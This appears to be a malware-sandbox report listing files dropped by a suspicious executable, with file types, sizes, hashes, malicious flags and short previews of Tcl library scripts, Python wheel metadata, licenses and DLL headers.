                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:Tcl script, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):107674
                                                                                                                                                                                                                              Entropy (8bit):4.841458743618635
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3072:74s6YTLsaoi4N8uBPM5PP9AlGXJL/ciBh:7N6Y9oi4N8uBPM5PP9AYXJL/ciBh
                                                                                                                                                                                                                              MD5:655EC828777244F9F048E0D08203482F
                                                                                                                                                                                                                              SHA1:790446D04FE7BE12FD5DCF6E6FBD4C5A08C45C98
                                                                                                                                                                                                                              SHA-256:35A88F56DF57E6AC6F2CCC4D193210FBB9BD224AC99670603E077DDF8C5610BC
                                                                                                                                                                                                                              SHA-512:C249CAA5DA76A0B0876DD1BD201FF2D249D4FCD8467992C9DE51BA5A1C5471F98C10D69C46DF5B25DBA7941F4301B446D90CBF17BCCFB8B0ED27B22BF4DA20F3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# tcltest.tcl --..#..#.This file contains support code for the Tcl test suite. It..# defines the tcltest namespace and finds and defines the output..# directory, constraints available, output and error channels,..#.etc. used by Tcl tests. See the tcltest man page for more..#.details...#..# This design was based on the Tcl testing approach designed and..# initially implemented by Mary Ann May-Pumphrey of Sun..#.Microsystems...#..# Copyright . 1994-1997 Sun Microsystems, Inc...# Copyright . 1998-1999 Scriptics Corporation...# Copyright . 2000 Ajuba Solutions..# Contributions from Don Porter, NIST, 2002. (not subject to US copyright)..# All rights reserved.....package require Tcl 8.5-..;# -verbose line uses [info frame]..namespace eval tcltest {.... # When the version number changes, be sure to update the pkgIndex.tcl file,.. # and the install directory in the Makefiles. When the minor version.. # changes (new feature) be sure to update the man page
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):118419
                                                                                                                                                                                                                              Entropy (8bit):4.888789841897662
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:RYY1IO/KuUhIW17zr1DLJuuBuFsj6aIsGc3e6xGxjndp72y4ebBxIQ30Ik:RbyOCuUv9r5LJmsjlxTxGxjndpCBeAQ0
                                                                                                                                                                                                                              MD5:ACB85FEB97B27F1362E1D76B686D498F
                                                                                                                                                                                                                              SHA1:92C370F838BD67C72E153FBF7AD05E26FF40A393
                                                                                                                                                                                                                              SHA-256:7A30E7A49C1F6939537EB7A80CF2F5BC7A4969F2B2AD99BA4E26DB85BBC2FCC7
                                                                                                                                                                                                                              SHA-512:EA504863386817E1B21549376148FD05C7EAF74F91A3A8DA97EFCF3784530ED3CF1910DF9B2431EC47D1175759CDEB1A0E9E9E02BBA94EC2123EAFB7CBD2B90A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# http.tcl --..#..#.Client-side HTTP for GET, POST, and HEAD commands. These routines can..#.be used in untrusted code that uses the Safesock security policy...#.These procedures use a callback interface to avoid using vwait, which..#.is not defined in the safe base...#..# See the file "license.terms" for information on usage and redistribution of..# this file, and for a DISCLAIMER OF ALL WARRANTIES.....package require Tcl 8.6-..# Keep this in sync with pkgIndex.tcl and with the install directories in..# Makefiles..package provide http 2.9.8....namespace eval http {.. # Allow resourcing to not clobber existing data.... variable http.. if {![info exists http]} {...array set http {... -accept */*... -pipeline 1... -postfresh 0... -proxyhost {}... -proxyport {}... -proxyfilter http::ProxyRequired... -repost 0... -urlencoding utf-8... -zip 1...}...# We need a useragent string of this style or various servers will...# refuse to send us compressed content
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1555736
                                                                                                                                                                                                                              Entropy (8bit):6.1820383306760185
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24576:gJ3uXVFKflt2zwvzPYHURwgVdF9EWyCzfdmHQnveD4CGan9nViFoHb15K3cmwdbo:yeFSpvzg0RwgVdF9EWyCzfdmHQnveD4Z
                                                                                                                                                                                                                              MD5:966580716C0D6B7EEC217071A6DF6796
                                                                                                                                                                                                                              SHA1:E3D2D4A7EC61D920130D7A745586CEB7AAD4184D
                                                                                                                                                                                                                              SHA-256:AFC13FCE0690C0A4B449EC7ED4FB0233A8359911C1C0BA26A285F32895DBB3D2
                                                                                                                                                                                                                              SHA-512:CF0675EA888A6D1547842BCFB27D45815B164337B4A285253716917EB157C6DF3CC97CBA8AD2AB7096E8F5131889957E0555BAE9B5A8B64745AC3D2F174E3224
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......y.P.=n>.=n>.=n>...?.?n>...;.1n>...:.5n>...=.9n>...:.>n>...:.<n>.4...-n>...?.(n>.=n?.wo>...6..n>...>.<n>.....<n>...<.<n>.Rich=n>.................PE..d...],.c.........." ...!............|...............................................4=....`..........................................?..L@..,...|........{...P..D......../.......E...T...............................S..@...............@............................text...h........................... ..`.rdata..0...........................@..@.data...............................@....pdata..D....P......................@..@.rsrc....{.......|..................@..@.reloc...E.......F...H..............@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4
                                                                                                                                                                                                                              Entropy (8bit):1.5
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Mn:M
                                                                                                                                                                                                                              MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                              SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                              SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                              SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:pip.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1130
                                                                                                                                                                                                                              Entropy (8bit):5.118590213496374
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:qt4rWHvH0yPP3Gt6Hw1hP9QHmsUv48OV/+dho3BoqxFB:/S/lPvKhlQHms5QK3WmFB
                                                                                                                                                                                                                              MD5:F0E423EEA5C91E7AA21BDB70184B3E53
                                                                                                                                                                                                                              SHA1:A51CCDCB7A9D8C2116D1DFC16F11B3C8A5830F67
                                                                                                                                                                                                                              SHA-256:6163F7987DFB38D6BC320CE2B70B2F02B862BC41126516D552EF1CD43247E758
                                                                                                                                                                                                                              SHA-512:8BE742880E6E8495C7EC4C9ECC8F076A9FC9D64FC84B3AEBBC8D2D10DC62AC2C5053F33B716212DCB76C886A9C51619F262C460FC4B39A335CE1AE2C9A8769A8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:This is the MIT license: http://www.opensource.org/licenses/mit-license.php..Copyright (c) Alex Gr.nholm..Permission is hereby granted, free of charge, to any person obtaining a copy of this.software and associated documentation files (the "Software"), to deal in the Software.without restriction, including without limitation the rights to use, copy, modify, merge,.publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons.to whom the Software is furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all copies or.substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,.INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR.PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE.FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF C
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3717
                                                                                                                                                                                                                              Entropy (8bit):4.986068381037722
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:DSQRbraktjaAckH94jQnJIK04Fak/grjspC3EklAJj:/Rakd4jA7ak/gvspNWmj
                                                                                                                                                                                                                              MD5:B6DAAC02F66AC8403E9061881322BABE
                                                                                                                                                                                                                              SHA1:9A94672CCFEA06156A5F8A321CD0626CFD233AE8
                                                                                                                                                                                                                              SHA-256:CF675C1C0A744F08580855390DE87CC77D676B312582E8D4CFDB5BB8FD298D21
                                                                                                                                                                                                                              SHA-512:9C6B7326C90396AA9E962C2731A1085EDB672B5696F95F552D13350843C09A246E0BBF0EC484862DFF434FA5A86DE4C0B7C963958ADE35A066B9D2384076DD47
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Metadata-Version: 2.1.Name: typeguard.Version: 4.3.0.Summary: Run-time type checker for Python.Author-email: Alex Gr.nholm <alex.gronholm@nextday.fi>.License: MIT.Project-URL: Documentation, https://typeguard.readthedocs.io/en/latest/.Project-URL: Change log, https://typeguard.readthedocs.io/en/latest/versionhistory.html.Project-URL: Source code, https://github.com/agronholm/typeguard.Project-URL: Issue tracker, https://github.com/agronholm/typeguard/issues.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: 3.11.Classifier: Programming Language :: Python :: 3.12.Requires-Python: >=3.8.Description-Content
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2402
                                                                                                                                                                                                                              Entropy (8bit):5.729208478282605
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:eDnuX3DVED9HDDeDfPDLkAosGDlDiVoBFj7XH0H3HuwVB6Kgfkx7J/Q1NK1cQyxk:eyX3WRHDiLPjksV7I47J/Q1U6Qyx5fsJ
                                                                                                                                                                                                                              MD5:D680B2881597974ACD91750E5AB61010
                                                                                                                                                                                                                              SHA1:E00ED2416B5CE21641E3946905504D62D536972F
                                                                                                                                                                                                                              SHA-256:48A51959582478352275428CEECD78EF77D79AC9DAE796E39A2EAF2540282552
                                                                                                                                                                                                                              SHA-512:112172ACB515B0712AC58D78898EB159580ADA3DD3F16AABB37CB7A8D964F9E4BADF2869A245927B83B208D56904831C0F04ED925C95DFCB705801734FB0C7BA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:typeguard-4.3.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..typeguard-4.3.0.dist-info/LICENSE,sha256=YWP3mH37ONa8MgzitwsvArhivEESZRbVUu8c1DJH51g,1130..typeguard-4.3.0.dist-info/METADATA,sha256=z2dcHAp0TwhYCFU5Deh8x31nazElgujUz9tbuP0pjSE,3717..typeguard-4.3.0.dist-info/RECORD,,..typeguard-4.3.0.dist-info/WHEEL,sha256=GJ7t_kWBFywbagK5eo9IoUwLW6oyOeTKmQ-9iHFVNxQ,92..typeguard-4.3.0.dist-info/entry_points.txt,sha256=qp7NQ1aLtiSgMQqo6gWlfGpy0IIXzoMJmeQTLpzqFZQ,48..typeguard-4.3.0.dist-info/top_level.txt,sha256=4z28AhuDodwRS_c1J_l8H51t5QuwfTseskYzlxp6grs,10..typeguard/__init__.py,sha256=Onh4w38elPCjtlcU3JY9k3h70NjsxXIkAflmQn-Z0FY,2071..typeguard/__pycache__/__init__.cpython-312.pyc,,..typeguard/__pycache__/_checkers.cpython-312.pyc,,..typeguard/__pycache__/_config.cpython-312.pyc,,..typeguard/__pycache__/_decorators.cpython-312.pyc,,..typeguard/__pycache__/_exceptions.cpython-312.pyc,,..typeguard/__pycache__/_functions.cpython-312.pyc,,..typeguard/__pycache__/_i
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):92
                                                                                                                                                                                                                              Entropy (8bit):4.812622295095324
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:RtEeX7MWcSlVlFxP+tPCCfA5S:RtBMwlVTxWBBf
                                                                                                                                                                                                                              MD5:43136DDE7DD276932F6197BB6D676EF4
                                                                                                                                                                                                                              SHA1:6B13C105452C519EA0B65AC1A975BD5E19C50122
                                                                                                                                                                                                                              SHA-256:189EEDFE4581172C1B6A02B97A8F48A14C0B5BAA3239E4CA990FBD8871553714
                                                                                                                                                                                                                              SHA-512:E7712BA7D36DEB083EBCC3B641AD3E7D19FB071EE64AE3A35AD6A50EE882B20CD2E60CA1319199DF12584FE311A6266EC74F96A3FB67E59F90C7B5909668AEE1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.43.0).Root-Is-Purelib: true.Tag: py3-none-any..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):48
                                                                                                                                                                                                                              Entropy (8bit):4.155187698990101
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:mWSJCQEjMitjHfLvn:mrMJHfbn
                                                                                                                                                                                                                              MD5:AEAB5BCF8BF89A51C97C4CDF70578848
                                                                                                                                                                                                                              SHA1:2E9C1617560AB66431AAB90700DB901985293485
                                                                                                                                                                                                                              SHA-256:AA9ECD43568BB624A0310AA8EA05A57C6A72D08217CE830999E4132E9CEA1594
                                                                                                                                                                                                                              SHA-512:2BE73E99296DF26A28835F91DD8BC50EB104AF06A3C54666175FAF322E0AD4620453DB0388531C4113B052A92C1D2E4C3088E25AF43CDE42AA852CF7B0CB5B05
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:[pytest11].typeguard = typeguard._pytest_plugin.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):10
                                                                                                                                                                                                                              Entropy (8bit):3.321928094887362
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:LEJn:M
                                                                                                                                                                                                                              MD5:004A2A8CE1AB120A63902A27D76BD964
                                                                                                                                                                                                                              SHA1:A4E367AB40410598DADD1FC5F680ED7A176BEB09
                                                                                                                                                                                                                              SHA-256:E33DBC021B83A1DC114BF73527F97C1F9D6DE50BB07D3B1EB24633971A7A82BB
                                                                                                                                                                                                                              SHA-512:0D8FF9A43897AB390AB41AFE5BAC8BD38A68C2BEF88E844E5B49BF70E3164B226975CC2717AE3DC3428D1CFBB0BE068C243F104915FEE1FFA58C23FBE76FDB89
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:typeguard.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1138456
                                                                                                                                                                                                                              Entropy (8bit):5.461877321211646
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12288:FrEHdcM6hb/CjJ43w9hIpCQvb0QN8MdIEQ+U2BNNmD+99FfcAa1:FrEXaCjfk7bPNfv42BN6yzUAa1
                                                                                                                                                                                                                              MD5:B848E259FABAF32B4B3C980A0A12488D
                                                                                                                                                                                                                              SHA1:DA2E864E18521C86C7D8968DB74BB2B28E4C23E2
                                                                                                                                                                                                                              SHA-256:C65073B65F107E471C9BE3C699FB11F774E9A07581F41229582F7B2154B6FC3C
                                                                                                                                                                                                                              SHA-512:4C6953504D1401FE0C74435BCEEBC5EC7BF8991FD42B659867A3529CEE5CC64DA54F1AB404E88160E747887A7409098F1A85A546BC40F12F0DDE0025408F9E27
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g...#.}.#.}.#.}.*..%.}..*|.!.}..*~. .}..*y.+.}..*x...}.6-|. .}.h.|.!.}.#.|.s.}.6-p.".}.6-}.".}.6-..".}.6-..".}.Rich#.}.........PE..d....f.........." ...(.@..........0*.......................................p......]M....`.........................................p...X............P.......@.......0.../...`......P^..T............................]..@............P..p............................text...!>.......@.................. ..`.rdata..\....P.......D..............@..@.data........ ......................@....pdata.......@......................@..@.rsrc........P.......$..............@..@.reloc.......`......................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4
                                                                                                                                                                                                                              Entropy (8bit):1.5
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Mn:M
                                                                                                                                                                                                                              MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                              SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                              SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                              SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:pip.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1107
                                                                                                                                                                                                                              Entropy (8bit):5.115074330424529
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:PWmrRONJHLH0cPP3gtkHw1h39QHOsUv4eOk4/+jvho3nPz:ttONJbbvE/NQHOs5eNS3n7
                                                                                                                                                                                                                              MD5:7FFB0DB04527CFE380E4F2726BD05EBF
                                                                                                                                                                                                                              SHA1:5B39C45A91A556E5F1599604F1799E4027FA0E60
                                                                                                                                                                                                                              SHA-256:30C23618679108F3E8EA1D2A658C7CA417BDFC891C98EF1A89FA4FF0C9828654
                                                                                                                                                                                                                              SHA-512:205F284F3A7E8E696C70ED7B856EE98C1671C68893F0952EEC40915A383BC452B99899BDC401F9FE161A1BF9B6E2CEA3BCD90615EEE9173301657A2CE4BAFE14
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MIT License..Copyright (c) 2012 Daniel Holth <dholth@fastmail.fm> and contributors..Permission is hereby granted, free of charge, to any person obtaining a.copy of this software and associated documentation files (the "Software"),.to deal in the Software without restriction, including without limitation.the rights to use, copy, modify, merge, publish, distribute, sublicense,.and/or sell copies of the Software, and to permit persons to whom the.Software is furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included.in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL.THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR.OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERW
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2153
                                                                                                                                                                                                                              Entropy (8bit):5.088249746074878
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:DEhpFu5MktjaywDK48d+md+7uT8RfkD1UKd+mOl1Awry:DEhpiMktjayq/7kOfsUzmbYy
                                                                                                                                                                                                                              MD5:EBEA27DA14E3F453119DC72D84343E8C
                                                                                                                                                                                                                              SHA1:7CEB6DBE498B69ABF4087637C6F500742FF7E2B4
                                                                                                                                                                                                                              SHA-256:59BAC22B00A59D3E5608A56B8CF8EFC43831A36B72792EE4389C9CD4669C7841
                                                                                                                                                                                                                              SHA-512:A41593939B9325D40CB67FD3F41CD1C9E9978F162487FB469094C41440B5F48016B9A66BE2E6E4A0406D6EEDB25CE4F5A860BA1E3DC924B81F63CEEE3AE31117
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Metadata-Version: 2.1.Name: wheel.Version: 0.43.0.Summary: A built-package format for Python.Keywords: wheel,packaging.Author-email: Daniel Holth <dholth@fastmail.fm>.Maintainer-email: Alex Gr.nholm <alex.gronholm@nextday.fi>.Requires-Python: >=3.8.Description-Content-Type: text/x-rst.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: Topic :: System :: Archiving :: Packaging.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: 3.11.Classifier: Programming Language :: Python :: 3.12.Requires-Dist: pytest >= 6.0.0 ; extra == "test".Requires-Dist: setuptools >= 65 ; extra == "test".Project-URL: Changelog, https://wheel.readthedocs.io/en/s
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4557
                                                                                                                                                                                                                              Entropy (8bit):5.714200636114494
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:QXVuEmegx01TQIvFCiq9H/H7vp88FxTXiJPkGJP4CWweXQHmnDpMI78IegK5EeZR:QXVxAbYkU4CWweXQHmnDpMeV2BvTRqQF
                                                                                                                                                                                                                              MD5:44D352C4997560C7BFB82D9360F5985A
                                                                                                                                                                                                                              SHA1:BE58C7B8AB32790384E4E4F20865C4A88414B67A
                                                                                                                                                                                                                              SHA-256:783E654742611AF88CD9F00BF01A431A219DB536556E63FF981C7BD673070AC9
                                                                                                                                                                                                                              SHA-512:281B1D939A560E6A08D0606E5E8CE15F086B4B45738AB41ED6B5821968DC8D764CD6B25DB6BA562A07018C271ABF17A6BC5A380FAD05696ADF1D11EE2C5749C8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:../../bin/wheel,sha256=cT2EHbrv-J-UyUXu26cDY-0I7RgcruysJeHFanT1Xfo,249..wheel-0.43.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..wheel-0.43.0.dist-info/LICENSE.txt,sha256=MMI2GGeRCPPo6h0qZYx8pBe9_IkcmO8aifpP8MmChlQ,1107..wheel-0.43.0.dist-info/METADATA,sha256=WbrCKwClnT5WCKVrjPjvxDgxo2tyeS7kOJyc1GaceEE,2153..wheel-0.43.0.dist-info/RECORD,,..wheel-0.43.0.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..wheel-0.43.0.dist-info/WHEEL,sha256=EZbGkh7Ie4PoZfRQ8I0ZuP9VklN_TvcZ6DSE5Uar4z4,81..wheel-0.43.0.dist-info/entry_points.txt,sha256=rTY1BbkPHhkGMm4Q3F0pIzJBzW2kMxoG1oriffvGdA0,104..wheel/__init__.py,sha256=D6jhH00eMzbgrXGAeOwVfD5i-lCAMMycuG1L0useDlo,59..wheel/__main__.py,sha256=NkMUnuTCGcOkgY0IBLgBCVC_BGGcWORx2K8jYGS12UE,455..wheel/__pycache__/__init__.cpython-312.pyc,,..wheel/__pycache__/__main__.cpython-312.pyc,,..wheel/__pycache__/_setuptools_logging.cpython-312.pyc,,..wheel/__pycache__/bdist_wheel.cpython-312.pyc,,..wheel/__pycache
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):81
                                                                                                                                                                                                                              Entropy (8bit):4.672346887071811
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:RtEeX/QFM+vxP+tPCCfA5I:Rt1Qq2WBB3
                                                                                                                                                                                                                              MD5:24019423EA7C0C2DF41C8272A3791E7B
                                                                                                                                                                                                                              SHA1:AAE9ECFB44813B68CA525BA7FA0D988615399C86
                                                                                                                                                                                                                              SHA-256:1196C6921EC87B83E865F450F08D19B8FF5592537F4EF719E83484E546ABE33E
                                                                                                                                                                                                                              SHA-512:09AB8E4DAA9193CFDEE6CF98CCAE9DB0601F3DCD4944D07BF3AE6FA5BCB9DC0DCAFD369DE9A650A38D1B46C758DB0721EBA884446A8A5AD82BB745FD5DB5F9B1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Wheel-Version: 1.0.Generator: flit 3.9.0.Root-Is-Purelib: true.Tag: py3-none-any.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):104
                                                                                                                                                                                                                              Entropy (8bit):4.271713330022269
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:1SSAnAYgh+MWTMhk6WjrAM5t5ln:1Jb9WTMhk9jUM5t5ln
                                                                                                                                                                                                                              MD5:6180E17C30BAE5B30DB371793FCE0085
                                                                                                                                                                                                                              SHA1:E3A12C421562A77D90A13D8539A3A0F4D3228359
                                                                                                                                                                                                                              SHA-256:AD363505B90F1E1906326E10DC5D29233241CD6DA4331A06D68AE27DFBC6740D
                                                                                                                                                                                                                              SHA-512:69EAE7B1E181D7BA1D3E2864D31E1320625A375E76D3B2FBF8856B3B6515936ACE3138D4D442CABDE7576FCFBCBB0DEED054D90B95CFA1C99829DB12A9031E26
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:[console_scripts].wheel=wheel.cli:main..[distutils.commands].bdist_wheel=wheel.bdist_wheel:bdist_wheel..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):217088
                                                                                                                                                                                                                              Entropy (8bit):5.933475371060306
